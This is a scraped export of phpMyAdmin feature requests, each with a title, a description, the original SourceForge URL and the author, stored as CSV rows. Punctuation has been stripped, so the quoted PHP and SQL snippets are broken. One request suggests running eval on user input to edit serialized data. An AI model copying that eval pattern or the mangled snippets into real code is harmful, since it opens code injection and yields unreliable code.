Thanks Terry Original URL https sourceforge.net p phpmyadmin feature requests 950 https sourceforge.net p phpmyadmin feature requests 950 Original author finian 826","enhancement"
"24444","5650","Use RENAME TABLE syntax for moving tables.
Instead of creating a new table and filling it with data from the old table when moving a table it is much easier and cheaper in terms of CPU memory consumption) to use the RENAME TABLE x TO y syntax.
Original URL https sourceforge.net p phpmyadmin feature requests 951 https sourceforge.net p phpmyadmin feature requests 951 Original author leonardjo2","enhancement"
"24444","5651","Allow SALT in ENCRYPT function.
It would be nice to allow a second parameter for the function ENCRYPT second field or special separator) in the insert form.
Thus it would be possible to use MD5 encryption with a twelve character salt starting with 1 .
Original URL https sourceforge.net p phpmyadmin feature requests 954 https sourceforge.net p phpmyadmin feature requests 954 Original author drgang","enhancement"
"24444","5652","Option to not display record counts for views.
In Short PhpMyAdmin brings down our server when it attempts to get record counts for complex views which take a long time to run.
We have to kill the processes manually.
The fix for us was to disable the record counts for views, but it would be nice to have an option to do so more easily within the config.inc.php The fix To libraries common.lib.php where I commented out lines 1421 1428 search file for SELECT 1 ).
I replaced the if block with a hard coded num = 0; OLD if !isset num)) \{ if !
tbl is view) \{ num = PMA DBI fetch value SELECT COUNT ) AS num FROM .
PMA backquote db) .
.
.
PMA backquote table)); necessary?
if !
num) \{ num = 0; \} since counting all rows of a view could be too long \} else \{ try query because if can fail a VIEW was based on a table that no longer exists) result = PMA DBI try query SELECT 1 FROM .
PMA backquote db) .
.
.
PMA backquote table) .
LIMIT .
cfg[ MaxExactCount ], null, PMA DBI QUERY STORE); if !PMA DBI getError )) \{ num = PMA DBI num rows result); \} else \{ num = 0; \} \} \} NEW if !isset num)) \{ if !
tbl is view) \{ num = PMA DBI fetch value SELECT COUNT ) AS num FROM .
PMA backquote db) .
.
.
PMA backquote table)); necessary?
if !
num) \{ num = 0; \} since counting all rows of a view could be too long \} else \{ num = 0; \} \} Original URL https sourceforge.net p phpmyadmin feature requests 952 https sourceforge.net p phpmyadmin feature requests 952 Original author rod apeldoorn","enhancement"
"24444","5653","Clever CSV import.
I think I could write a better import, but I haven t the time, it s too strict, too hard to use, it assumes too much of the user, it isn t smart enough to know how to shape the table to the data.
It doesn t seemt ot make a first pass at the data to determine how to shape the table its importing to.
I had planned to take a CSV extracted from a client s XLS file, and dump it directly into a table, then shape it down from that, but after reading the source code I got the feeling the original coder hacked it end to end for a particular kind of csv format.
I like phpMyAdmin, but this code could be improved on A LOT).
I found global vars, localization as global strings, localization should probably be a special class to avoid variable conflicts in the global scope.
But that has nothing to do with the problem.
I expect the code could be reduced by about a third or half what csv.php is now.
Also error checks like if count values) != required fields) \{ message = sprintf strInvalidCSVFieldCount, line); show error header = TRUE; error = TRUE; break; \} Is a sign of poor flexibility..
Try never to use !=, unless you are dealing with booleans, where the likelihood is greater that it will be true or false.
I don t see examples of how to handle the case where the csv data is greater or less than.. You will know this is a valid feature when it can handle less space fill), or greater than truncate or expand table).
Otherwise drop the feature, it s useless..
Original URL https sourceforge.net p phpmyadmin feature requests 953 https sourceforge.net p phpmyadmin feature requests 953 Original author rofthorax","enhancement"
"24444","5654","Change the order of the fields in a table.. Hi.
It is possible to change the order of the fields in a table without having to first delete the field and then create it again.
So It would be nice to be able to mark a field in a table and then tell phpmyadmin which field you want to place it AFTER or eventually place it FIRST in the table.
Example of how to move a field after another field ALTER TABLE test MODIFY COLUMN ColNameToMove tinyint 3) UNSIGNED NOT NULL DEFAULT 0 AFTER ColNameToMoveAfter Have tested the above and it works like a charm.
The MySql specification also states that we can use FIRST instead of AFTER ColNameToMoveAfter to put the field first in the field list.
It would be supercool if PHPMYADMIN could implement this feature.
Anyway, thanks for the best MySQL Database Administration tool there is.
Original URL https sourceforge.net p phpmyadmin feature requests 955 https sourceforge.net p phpmyadmin feature requests 955 Original author bngobngo","enhancement"
"24444","5655","Hide information schema database .
It would be nice to be able to hide the virtual information schema database in phpMyAdmin when applicable.
Preferably by using a configuration directive in config.inc.php for users that do only have read privileges for that database .
It confuses some of my users that only have access to one or a few database s).
Original URL https sourceforge.net p phpmyadmin feature requests 956 https sourceforge.net p phpmyadmin feature requests 956 Original author spithost","enhancement"
"24444","5656","English only version.
Having a slimmed vesrion of PHPmyAdmin with JUST the english langauage to save download bandwidth and server space.
Original URL https sourceforge.net p phpmyadmin feature requests 957 https sourceforge.net p phpmyadmin feature requests 957 Original author willlangford","enhancement"
"24444","5657","logout button.
Everytime I use this wonderful program I get the feeling that I need a button that says logout .
I get uncomfortable leaving open access to my databases to whomever comes along.
Thanks, Ephraim F. Moya Original URL https sourceforge.net p phpmyadmin feature requests 958 https sourceforge.net p phpmyadmin feature requests 958 Original author efmoya","enhancement"
"24444","5658","Compare two schemas.
It would be really handy to have a feature on the operations which could generate a view or sql, or even a report to show the difference between two tables structure and or rows.
From here you could then generate update sql scripts that developers could use to maintain Db driven web software.
Quite a handy feature I would think.
I ve been trying to understand a schema for days now and thought that the easiest way would be to insert a new product with the front end and see all the changes it makes to the tables, but alas there are no tools on Mac) to do this.
I actually just want to see what gets inserted where, but you might as well go the full hog if your going to do it.
Just a thought...
Original URL https sourceforge.net p phpmyadmin feature requests 959 https sourceforge.net p phpmyadmin feature requests 959 Original author cpill","enhancement"
"24444","5659","Checkbox styling.
As Internet Explorer does not support stylesheets with [attr] selector, I would appretiate if you add a class attribute to the input type=checkbox.
The default margin padding values of checkboxes are in many cases too big, so the rows in the table are stretched in height where the normal content is smaller.
I ve added the attribute myself but I don t want to do it avery time a new version comes out.
Regards SelfMan Original URL https sourceforge.net p phpmyadmin feature requests 960 https sourceforge.net p phpmyadmin feature requests 960 Original author selfman","enhancement"
"24444","5660","new config variables not recognized till session end.
Windows XP SP2 Apache 2.0.55 Win32) PHP 5.1.4 mod ssl 2.0.55 OpenSSL 0.9.8a PHP Version 5.1.4 post max size 50M 50M upload max filesize 50M 50M Server gt; Import reports max upload size 2.048KiB additionally there could be a link to documentation where is described how this value is calculated.
Original URL https sourceforge.net p phpmyadmin feature requests 961 https sourceforge.net p phpmyadmin feature requests 961 Original author cybot tm","enhancement"
"24444","5661","Create PHP Code double quotes instead).
I notice the style uses single quotes, well most of the time when we are creating PHP code, we are modifying the code and adding variables to the sql statements.
It would be nice if there was a create php code which used double quotes, then there would be no need to backslash single quotes, and we could easily add variables inside of the statement blahblah what do you think?
Original URL https sourceforge.net p phpmyadmin feature requests 962 https sourceforge.net p phpmyadmin feature requests 962 Original author relipse","enhancement"
"24444","5662","Do you know FCKeditor?.
Hi, all!
Do you know FCKEditor?
It is a free javascript tool, easy to use, wysiwyg html editor.
Wouldn t it be nice to edit mysql data via phpmyadmin as html wysiwyg?
Let me know! )
maros This HTML text editor brings to the web many of the powerful functionalities of desktop editors like MS Word.
It s lightweight and doesn t require any kind of installation on the client computer.
http www.fckeditor.net http www.fckeditor.net demo Original URL https sourceforge.net p phpmyadmin feature requests 963 https sourceforge.net p phpmyadmin feature requests 963 Original author mutant sk","enhancement"
"24444","5663","AJAX based graphical query builder.
One admittedly quirky step in my workflow is to build complex MySQL queries using Microsoft Access visual query builder.
This useful feature displays tables and their fields graphically, allowing me to construct queries quickly and intuitively by dragging and dropping query elements, including relationships.
For the most part, the resulting SQL statements come over to MySQL easily, but it is an extra hurdle I wish I didn t have to jump through and is one which I don t jump unless I m building complex queries with various types of JOIN statements.
I ve been searching for an equivalent to Access tool for ages but have never found one.
Some come close but none do exactly what I need with ease.
If I had time, I would write my own AJAX tool to do this I tend to roll my own solutions for this type of thing), but even the best tool I could write would be the poor man s replacement for one integrated directly into phpMyAdmin.
PS To give you an idea of how useful this is to me it is the only use for Access I ve had in years, and is, in fact, one of the only uses I have for Windows at all.
I m in a Mac environment, and every time I have to build a complex query, I have to fire up WinXP in a Parallels virtual machine.)
Original URL https sourceforge.net p phpmyadmin feature requests 964 https sourceforge.net p phpmyadmin feature requests 964 Original author sstringer","enhancement"
"24444","5664","Warning for using keywords as names.
What about a feature to inform users which try to use a keyword of MySQL as a name of tables or columns.
On support platforms you get several task like why is my query SELECT read FROM select doesn t work?
.
To prevent these maybe you could add a keyword checker for table column names.
So every try someone add a table with a keyword he gets a warning not an error) that he is using a keyword as a name and should be use another name for it.
If the user knows what he do he can click on sth.
like Edit Anyway and it save add edit the table anyway.
Original URL https sourceforge.net p phpmyadmin feature requests 965 https sourceforge.net p phpmyadmin feature requests 965 Original author progi","enhancement"
"24444","5665","Transformation Options Changes.
gt; Much like the ENUM SET Fields, you have to split up several options using the format a , b , c ,...
NOTE THE MISSING BLANKS).
This is because internally the options will be parsed as an array, leaving the first value the first element in the array, and so forth.
Please include a number in the example, as it appears numbers need to be escaped too.
Could you also improve the parser to remove the need to escape numbers and the need to remove spaces?
Also, would it be possible to specify default options in the conf file?
Original URL https sourceforge.net p phpmyadmin feature requests 966 https sourceforge.net p phpmyadmin feature requests 966 Original author olafvdspek","enhancement"
"24444","5666","Default Options for Transformations.
Hi, It d be nice if default options could be set in the conf file for all transformations.
Original URL https sourceforge.net p phpmyadmin feature requests 967 https sourceforge.net p phpmyadmin feature requests 967 Original author olafvdspek","enhancement"
"24444","5667","security issue contest?.
Hello, phpmyadmin is a good software ... but it s a hell to include it in a Linux distro why???
the number of security issues Maybe it is a contest between you and Microsoft?
I think it s time to audit code and track all security problem in phpmyadmin before add anything else.
Hope it would be done ... ) Regards.
Original URL https sourceforge.net p phpmyadmin feature requests 968 https sourceforge.net p phpmyadmin feature requests 968 Original author jshlinux","enhancement"
"24444","5668","Vertical Field Editor.
Hi, The field editor is very wide.
Could it be made vertical, at least when you re only editing a single field?
Original URL https sourceforge.net p phpmyadmin feature requests 969 https sourceforge.net p phpmyadmin feature requests 969 Original author olafvdspek","enhancement"
"24444","5669","dont disable BROWSE tab.
When a table has no entries, the browse tab for that table is inactive and has a mouseover image of a red cross.
I d like to see this change back to having the browse tab active, but with the mouseover image still there to show that there are potentially no entries.
The reason for this is so that you can browse the data in the table, that has been put there by another user or process, since the page was created and displayed.
It is still accessible on the left frame next to the table name, so why not on the main frame.
Original URL https sourceforge.net p phpmyadmin feature requests 970 https sourceforge.net p phpmyadmin feature requests 970 Original author waygood","enhancement"
"24444","5670","Add httponly support to cookies session IDs).
This is actually a feature request.
Could you please consider adding httpOnly support for the phpmyadmin cookies sessionID especially)?
It would help to fix at least some potential problems with XSS.
For details please see http ilia.ws archives 121 httpOnly cookie flag support in PHP 5.2.html http blog.php security.org archives 40 httpOnly Cookies in Firefox 2.0.html Internet Explorer 6 and 7 as well as Opera etc.?
still unsure) support it already.
For Firefox 2 there is an extension available.
Original URL https sourceforge.net p phpmyadmin feature requests 971 https sourceforge.net p phpmyadmin feature requests 971 Original author neufeind","enhancement"
"24444","5671","Decrement auto increment.
It would be really convenient to condense the data in a table if, when deleting the latest entry in a table that has AUTO INCREMENT defined on the primary key, phpMyAdmin would automatically lower the AUTO INCREMENT value to the smallest possible value.
This could be implemented in several ways either have the normal delete row key automatically lower the value after the deletion, or add an additional delete key for this purpose, or add a checkbox that reads something like condense auto increment after deleting that could be checked on or off.
Original URL https sourceforge.net p phpmyadmin feature requests 972 https sourceforge.net p phpmyadmin feature requests 972 Original author soapergem","enhancement"
"24444","5672","Show PK info in navigation frame.
For quicker database development, it would be nice to have the primary key s type and length in the table list left frame).
It could be within the tooltip along with the number of rows.
Thank you in advance, Anna Original URL https sourceforge.net p phpmyadmin feature requests 973 https sourceforge.net p phpmyadmin feature requests 973 Original author popugaichik","enhancement"
"24444","5673","Include config.inc.php via PHP s include path .
Currently, the file config.inc.php seems to be included with a leading .
.
config.inc.php ), which causes PHP s include path to be ignored.
It would be desireable to have it included just as config.inc.php , which would allow configurations where the config resides outside the publicly accessible web directory for security reasons prevent accidental revelation of passwords, eg.
when PHP isnt configured correctly, or if the file is renamed.
I m using a shell editor, for example, which creates a backup file called config.inc.php .
If i forget to delete it, the previous config is visible to everyone).
Original URL https sourceforge.net p phpmyadmin feature requests 974 https sourceforge.net p phpmyadmin feature requests 974 Original author gwani666","enhancement"
"24444","5674","Add php.ini session.save path check to FAQ 2.8.
FAQ 2.8 lists scenarios that lead to missing parameter errors.
Suggest adding further scenario In the php.ini directive session.save path, if the directory does not exist or is read only these errors will occur.
As per https sourceforge.net tracker index.php?func=detail aid=1601948 group id=23067 atid=377409) Original URL https sourceforge.net p phpmyadmin feature requests 976 https sourceforge.net p phpmyadmin feature requests 976 Original author dpdnolan","enhancement"
"24444","5675","Reload Button in left frame.
Hi!
It would be nice if there where a reload button next to the buttonbar in the left frame.
I often change tables create, rename, ...) and I have to reload manually via context menu, which is complicated.
A nav.location.reload ) would be enough.
Alex.
Original URL https sourceforge.net p phpmyadmin feature requests 975 https sourceforge.net p phpmyadmin feature requests 975 Original author alex2222","enhancement"
"24444","5676","Filter Database Structure List of tables).
The ability to filter the table list that shows when you click on the Structure tab of any database.
Therefore you might only want to show the list of tables with the prefix of test in their table names.
This would make maintaining databases with a huge amount of tables much more manageable.
To achive this you could add a filter text input field at the bottom of the page where you could enter a filter such as test to display tables starting with test , or test to display table with the word test located anywhere in the name.
Cheers bigmudcake.
Original URL https sourceforge.net p phpmyadmin feature requests 978 https sourceforge.net p phpmyadmin feature requests 978 Original author bigmudcake","enhancement"
"24444","5677","Button to Copy 1 or more Records.
Location Browsing Records Request Add a Copy button option to the With Selected section of tools below the records displayed).
Checking record boxes and selecting the Copy button would insert copies of the selected records with unique auto increment values).
Original URL https sourceforge.net p phpmyadmin feature requests 977 https sourceforge.net p phpmyadmin feature requests 977 Original author daveberk","enhancement"
"24444","5678","non frame version.
It would be great if there was a version of PMA with no frames.
Original URL https sourceforge.net p phpmyadmin feature requests 979 https sourceforge.net p phpmyadmin feature requests 979 Original author bibakisv","enhancement"
"24444","5679","Create database if not exists).
Hi, gt; Create database with same name and grant all privileges Could you add if not exists to this query so that it also works when the database exists already?
Original URL https sourceforge.net p phpmyadmin feature requests 980 https sourceforge.net p phpmyadmin feature requests 980 Original author olafvdspek","enhancement"
"24444","5680","Autoincrement on Save as new row .
When I open an entry to save it as a new row , the autoincrement value should be cleared automatically when selecting this option.
If not done, it is impossible to write that query, because it would be a duplicate entry.
Original URL https sourceforge.net p phpmyadmin feature requests 981 https sourceforge.net p phpmyadmin feature requests 981 Original author dj n4cer","enhancement"
"24444","5681","Support for editing binary fields in hexadecimal.
tbl change.php currently contains the following note We don t want binary data to be destroyed Note from the MySQL manual BINARY doesn t affect how the column is stored or retrieved so it does not mean that the contents is binary The problem is that binary fields are byte arrays rather than strings.
Using binary fields instead of textual fields is a bad practicle because there is high chance that the data will be displayed incorrectly or data loss will occur.
There is no problem for SBCS single byte character set) encodings because the byte to character mapping is a 1 to 1 mapping.
MBCS multi byte character set) encodings on the other hand can map some characters to a byte squence longer than one byte.
The data loss can occur at a very high probability with MBCS encodings) because proper decoder implementations has to filter out invalid byte sequences and when the data is converted back to a byte array, these invalid byte sequences are lost.
I usually use binary fields to store password hashes and small image files.
This problem not only affects East Asian languages but UTF 8 as well.
And because UTF 8 is widely used by now some solution is necessary.
A very obvious solution is to modify the user interface to edit binary fields in hexadecimal.
Note that phpMyAdmin already has support for exoprting binary fields in hexadecimal and that is the default settings.
I believe that binary fields are intended to store binary non textual) data and as such they are better to be edited in hexadecimal.
I suggest to make this behavior default.
And this would render cfg[ ProtectBinary ] unnecessary so removing cfg[ ProtectBinary ] should be considered as well.
Original URL https sourceforge.net p phpmyadmin feature requests 982 https sourceforge.net p phpmyadmin feature requests 982 Original author kornelpal","enhancement"
"24444","5682","Empty Truncate Database.
Hi, Could you add an empty truncate database option that deletes all tables but not the database itself)?
Original URL https sourceforge.net p phpmyadmin feature requests 983 https sourceforge.net p phpmyadmin feature requests 983 Original author olafvdspek","enhancement"
"24444","5683","Export without comments.
Hi, Could you add an option to export without comments?
Original URL https sourceforge.net p phpmyadmin feature requests 984 https sourceforge.net p phpmyadmin feature requests 984 Original author olafvdspek","enhancement"
"24444","5684","PMA SPEED.
I have trouble with PhpMyADMIN.
I have a lot of db on the server and when I connecting to PhpMyADMIN with root privilege its loading 15 20 min.
The problem is that for all databases itxe2x80x99s calculating size, count of tables etc.
show table status from database as I think) Also this process is taking to lot of recourse of the server.
In configs of PMA I didnxe2x80x99t find any possibility to switch off this function.
How can I do this?
Original URL https sourceforge.net p phpmyadmin feature requests 985 https sourceforge.net p phpmyadmin feature requests 985 Original author vitar","enhancement"
"24444","5685","onMouseOver.
The onMouseMove and other stuff concerning the td s and tr s make it really laggy when loading and when scrolling down on my browser.
Its not that much of a concern but atleast an option to remove this would be helpful.
Original URL https sourceforge.net p phpmyadmin feature requests 986 https sourceforge.net p phpmyadmin feature requests 986 Original author bowlpack","enhancement"
"24444","5686","Add Variable input field on SQL bookmark creation form.
When you create a bookmark for a query which returns many rows, we could be able to filtrate a bit by giving a sample value to [VARIABLE].
Original URL https sourceforge.net p phpmyadmin feature requests 987 https sourceforge.net p phpmyadmin feature requests 987 Original author iclem","enhancement"
"24444","5687","View edit serialized data.
It d be helpfull to have a button next to a field which does sth.
like that data=unserialize FIELD CONTENT); var dump data); I know, that this is a security issue and for that reason it should be disabled by default.
The next step would be to allow me to edit the data and feed it back to the database eval data= .USER INPUT); data=serialize data); ...Put back in DB.
Best regards, Thomas Koch Original URL https sourceforge.net p phpmyadmin feature requests 988 https sourceforge.net p phpmyadmin feature requests 988 Original author thkoch2001","enhancement"
"24444","5688","Show the SQL statement for updates to constraints.
I m very happy with the convention in phpMyAdmin of showing me the SQL statement which accompanies pretty much anything I do.
However, this feature is missing from the Relation View page.
It would be really handy to have it there as well, so that I can see the actual SQL statements use to adjust the constraints.
Original URL https sourceforge.net p phpmyadmin feature requests 989 https sourceforge.net p phpmyadmin feature requests 989 Original author rob263","enhancement"
"24444","5689","Triggers Stored Procedures.
Triggers and Stored Procedures are for MySQL new features that have been implemented in version 5.0.2.
It would be nice if phpmyadmin would allow us to maintain those just like you can maintain data indexes etc...
I know I m asking for a big or actually two big) new features, but if we keep looking at the future, I think it s in everyone s interest if these features get added to phpmyadmin. )
Original URL https sourceforge.net p phpmyadmin feature requests 991 https sourceforge.net p phpmyadmin feature requests 991 Original author renox","enhancement"
"24444","5690","Add hex unhex functions.
Hi, Could you add the hex and unhex functions to the list of available functions when inserting data?
Original URL https sourceforge.net p phpmyadmin feature requests 990 https sourceforge.net p phpmyadmin feature requests 990 Original author olafvdspek","enhancement"
"24444","5691","need logout re implemented....
I use phpMyAdmin for remote administration of my systems from time to time like at a public library while I m traveling).
I can close my session, but sometime around release 2.6 or .7 the logout option was removed.
I need to in some positive way log myself off the machine I was just on, and ideally have any access cookies deleted.
Calling the login.php?message=expired would probably be good enough.
Anyway, it s a security issue for me.
If I finish a session, and someone at the library comes over and accesses the browser s history, they can just pop right back in where I left off.
Not a good thing.
K Original URL https sourceforge.net p phpmyadmin feature requests 992 https sourceforge.net p phpmyadmin feature requests 992 Original author keithleeds","enhancement"
"24444","5692","ahh, cfg[ Export ][ sql complete ]=[ sql columns ].
i d like to be able to define the default state of the checkbox cfg[ Export ][ sql complete ] = FALSE; in config.inc.php like cfg[ Export ][ sql extended ] = TRUE; Original URL https sourceforge.net p phpmyadmin feature requests 993 https sourceforge.net p phpmyadmin feature requests 993 Original author windkiel","enhancement"
"24444","5693","Create varchar field with default empty string)..
Allow create varchar column filed) with NOT NULL and default options.
.... like this sql syntaxe `vch` VARCHAR 32) NOT NULL default Solution or another way ) ) Create a check box EMPTY STRING for default value on the create table page).
Cause Discussion Forums thread https sourceforge.net forum message.php?msg id=4091788 thanks gracias danke Original URL https sourceforge.net p phpmyadmin feature requests 994 https sourceforge.net p phpmyadmin feature requests 994 Original author sangala","enhancement"
"24444","5694","catch errno 13. catch errno 13 and tell the user to check file owner and permission for the MySQL installation errno 13 means MySQL cannot create or access database specific files whether due to missing rights or illegal chars in filename databasename tablename Original URL https sourceforge.net p phpmyadmin feature requests 995 https sourceforge.net p phpmyadmin feature requests 995 Original author cybot tm","enhancement"
"24444","5695","Change session timeouts before slow operations.
If the MySQL server has timeouts set, such as the following, in my.cnf, phpMyAdmin may discover that the MySQL server has gone away when performing a slow operation such as Operations gt; Sort on a large table.
interactive timeout=60 Example SQL issued by phpMyAdmin ALTER TABLE `rik1` ORDER BY `alok` ...where `rik1` is a large table which takes a long time to sort alter).
The error message apparently phpMyAdmin issues this after?
the sorting, the important thing is the error code at the end) 8 lt; Fel SQL frxc3xa5ga Dokumentationxc3x84ndra SELECT master field, foreign db, foreign table, foreign field FROM `pmadb`.`pma relation` WHERE master db = ortnamndb AND master table = rik1 MySQL sa Dokumentation 2006 gt;8 My suggestion would be that a timeout changing SQL command should precede all database connections to circumvent timeout problems on servers which have timeouts set SET SESSION interactive timeout=1800, SESSION wait timeout=1800; ...where 1800 seconds) should be replaced by a large enough value, perhaps configurable?
Thanks in advance!
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin feature requests 996 https sourceforge.net p phpmyadmin feature requests 996 Original author bwiberg","enhancement"
"24444","5696","Import Excel CSVs.
Currently the import facility doesn t work with CSVs exported from Excel.
I think this would be useful as I m sure I m not the only one who writes the odd script to do this...
Original URL https sourceforge.net p phpmyadmin feature requests 997 https sourceforge.net p phpmyadmin feature requests 997 Original author fyre666","enhancement"
"24444","5697","Data Export Import direct into another mysql server.
Sometimes I miss a feature in phpMyAdmin, that allows to Export a whole Database or a single Table direct into another MySQL Server.
For example, I have a database test on Server A.
Now I want to copy the complete database structure and data) into server B.
By now, you have to export the data as an SQL File which can get very large), copy it to server B, and import it there.
That comes with all problems, apache, php and MySQL provide ).
MAX UPLOAD SIZE, MAX EXECUTION TIME, mysql has gone away...
I imagine an extra option in the EXPORT or the Import) tab, called export to another server or similar.
Then I provide IP Host, user name, password and the database name, and finally, phpmyadmin starts transferring the data.
I don t think, that this is very difficult to code, but I believe, that many users could find this feature helpful.
regards, the moscher Original URL https sourceforge.net p phpmyadmin feature requests 998 https sourceforge.net p phpmyadmin feature requests 998 Original author moscher","enhancement"
"24444","5698","OpenID integration.
I would love to see OpenID integration in PMA.
This could work in three ways that I foresee, perhaps the choice could be offered in the config file.
1\.
A standard config auth is used, but the OpenID or array of several IDs) is also included.
A user logs in with his her openid and is logged in using the config user and password vars.
Pros simple, wouldn t need much work relatively speaking) Cons ties the user to a single MySQL username.
2\.
An associative array in the config file would tie each openid to a single user password pair.
Pros also simple, wouldn t need much more work than option 1, would allow multiple users.
Cons still ties each openid to a single MySQL username.
3\.
The pma database could have a new table to tie openids to particular MySQL logins.
Pros same as option 1, would allow for easier editing of openids.
Cons same as above, requires more work.
The single user problem here could be worked around by allowing several users per openid, but this would be non intuitive, would require that the login page offer a choice of users, and would require a crapload of work.
JanRain Inc. already has a PHP openid library to make this easier, so there isn t much work that would need to be done.
I would do it myself if I weren t so useless at modifying other people s code.
Another advantage of openid integration is the iwantmyopenid.com bounty of 5,000 to FLOSS projects with large user bases that use openid.
I believe PMA is large enough to qualify. )
I know that all these have problems, probabally some that I didn t even think of, but the advantage of FLOSS is that everyone can groupthink and come up with a better idea.
Anyone have any?
Original URL https sourceforge.net p phpmyadmin feature requests 999 https sourceforge.net p phpmyadmin feature requests 999 Original author joshiesurber","enhancement"
"24444","5699","While processing large querys, release PHP session lock.
Hello BugTrackers.
My PHP Session is locked, while my database is collecting and reading data.
In this time, i can t access to phpMyAdmin in new windows.
Kind regards, Michael Rack Germany Original URL https sourceforge.net p phpmyadmin feature requests 1001 https sourceforge.net p phpmyadmin feature requests 1001 Original author rcrack2k","enhancement"
"24444","5700","Theme by DataBase.
Hi Is it possible to add this functionnality I want to define a theme by DataBase.
Why ?
I use phpMyAdmin every day, every hours, on few database.
I open a firefox tab for each phpmyadmin on each database.
Exemple DB1 in dev, DB1 in test, DB1 in prod etc...
If i can define different theme pour each database, It will be better to me, do not make mistake by using database for an another one.
Is it clear ?
Sorry for my english ; ) JFL Original URL https sourceforge.net p phpmyadmin feature requests 1002 https sourceforge.net p phpmyadmin feature requests 1002 Original author jfleost","enhancement"
"24444","5701","Legacy support for Chinese Database using latin1 ascii).
There are so many many databases in China Taiwan region are still running under traditional database.
i.e.
using latin1 to store big5 gb2312 Chinese text in mysql 3 4 5 because the old program do not using Unicode or specific language setting or other reason.
In phpmyadmin 2.5.7 or before, the phpmyadmin was still running in without unicode base without conversion), we can still maintenance the database.
However after version 2.6 , the backend are running in unicode, we cannot able to view edit the Chinese because of the text conversion issue and cause big trouble to many user.
So I would like to suggest to add an legacy support to these database.
Base on the current phpmyadmin coding 1\.
the available language may be have one more set for the big5 latin1 gb2312 latin1 for the user to choose.
2\.
The html tag for the web pages have to be big5 gb2312 and the connection collation have to be latin1 back to the traditional).
Finally the data must be displayed as the original text i.e.
no need to convert to Unicode UTF 8).
The Chinese text should be display edit correctly by web browser.
However the language file use the current big5 gb2312 files should be OK. Or any other way to force phpmyadmin to run without unicode and no text conversion is also possible.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 1000 https sourceforge.net p phpmyadmin feature requests 1000 Original author siusun","enhancement"
"24444","5702","Don t use redirects for error messages.
Hi, At the moment a redirect is used to display error messages.
This means that a refresh F5) doesn t work as expected.
Please don t use redirects and make refresh work.
Especially in the case of 2003 Can t connect to MySQL server on localhost 10061) Original URL https sourceforge.net p phpmyadmin feature requests 1003 https sourceforge.net p phpmyadmin feature requests 1003 Original author olafvdspek","enhancement"
"24444","5703","Create indexes at the end in SQL export.
It will be nice to make an optimized export , so when i ll export a database the indexes of the tables to be created to the bottom of the file after the tables creations and data inserts update replace).
In this way when i import the database the time spent will be much smaller.
I saw that a solution for myisam tables is to disable keys and after inserts to enable keys, but for innodb tables i did t find other solutions.
sorry for my poor english.
the export file structure 1\.
create tables without indexes 2\.
insert data 3\.
create indexes ps.
i spent 4h to import a 30Mb sql file on windows... ; thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 1004 https sourceforge.net p phpmyadmin feature requests 1004 Original author guvi77","enhancement"
"24444","5704","Run SQL query queries improvments.
Hello, i have a feedback about Run SQL query queries .
It is possible that this textarea to become resizable ?
To could drag and resize his width and height to could see much better out big SQL command that we write and to keep that position even if we refresh page, and there is possible to see that SQL code in highlight mode.. live as we type ?
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1005 https sourceforge.net p phpmyadmin feature requests 1005 Original author orice on","enhancement"
"24444","5705","show master slave status as a tab.
show processlist; is already in the tabs of server.
it would be nice if there s also show master slave status that have a pretty output than normal query too.
doing show slave status as normal query is so ugly, looks like a table with so many fields, making it unreadable.
Original URL https sourceforge.net p phpmyadmin feature requests 1006 https sourceforge.net p phpmyadmin feature requests 1006 Original author xuefer","enhancement"
"24444","5706","Change Password Generate.
Hi, The Change Password form does not have a generate password option.
Could you add it?
Original URL https sourceforge.net p phpmyadmin feature requests 1007 https sourceforge.net p phpmyadmin feature requests 1007 Original author olafvdspek","enhancement"
"24444","5707","Textarea for ENUM datatype instead of textbox.
Hello, It would be great to have a textarea while creating modifying table structure instead of existing small size textbox as entering large number of ENUM values becomes difficult.
Thanks, Aditya Original URL https sourceforge.net p phpmyadmin feature requests 1008 https sourceforge.net p phpmyadmin feature requests 1008 Original author adityamooley","enhancement"
"24444","5708","no alert windows designer).
The alert windows are really annoying, please remove or change them.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1009 https sourceforge.net p phpmyadmin feature requests 1009 Original author phpmyforum","enhancement"
"24444","5709","Configurable warning for absence of mcrypt extension.
Hi!
I would suggest that the warning for absence of the mcrypt extension, in main.php, should be possible to turn off.
As it is now, the warning message is shown by main.php because libraries auth cookie.auth.lib.php defines PMA WARN FOR MCRYPT which cannot be undefined later as it is a constant).
Many thanks in advance!
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin feature requests 1010 https sourceforge.net p phpmyadmin feature requests 1010 Original author bwiberg","enhancement"
"24444","5710","Can t set empty string as default.
Hi, It s not possible to set the empty string as default.
This is important when MySQL is running in strict mode.
Original URL https sourceforge.net p phpmyadmin feature requests 1011 https sourceforge.net p phpmyadmin feature requests 1011 Original author olafvdspek","enhancement"
"24444","5711","Show last query after insert edit ....
I don t know for how long this feature is removed, but I really miss it Original URL https sourceforge.net p phpmyadmin feature requests 1012 https sourceforge.net p phpmyadmin feature requests 1012 Original author phpmyforum","enhancement"
"24444","5712","view bookmark from db sql shows no textarea not editbale.
Using phpMyAdmin 2.10.0.2, MySQL 4.1.13a, php version 4.4.0.
If one has a bookmarked SQL query and simply wants to view it, it can only be viewed if one is in any table within the database the query is related to.
If one is at the the web page listing all the tables in that database, and then selects the SQL tab and then uses the pull down to pick a bookmarked SQL statement, and then selects the radio button to view only , the SQL statement is actually run upon submitting the form.
However, if one is already viewing a particular table s properties when they select the SQL tab, and the dropdown with the SQL bookmark, then view only does work properly.
Browsers this bug has been tested with Safari 2.0.4, Firefox 1.5.0.10 and Firefox 2.0.0.2 all running on Mac OS X 10.4.8 [PPC and Intel] and 10.4.7 [PPC only].
Original URL https sourceforge.net p phpmyadmin feature requests 1013 https sourceforge.net p phpmyadmin feature requests 1013 Original author vjl323","enhancement"
"24444","5713","default settings change.
just a question though.
wont it be possible shipping phpmyadmin with arctic ocean as a default theme?
the origional theme is kinda boring etc.. no offence.
the other default setting would be the cfg[ DefaultTabTable ] = sql.php ; as most of the hosting companies dont bother changing the phpmyadmin instalation.
maybe bring in a temp selection.
on the home page have a drop down box where the user selects what clicking on the table name on the left frame should show.
this writes a cookie.
if the cookie isnt found it uses the default of DefaultTabTable Original URL https sourceforge.net p phpmyadmin feature requests 1014 https sourceforge.net p phpmyadmin feature requests 1014 Original author williamstam","enhancement"
"24444","5714","Support for Stored Procedure.
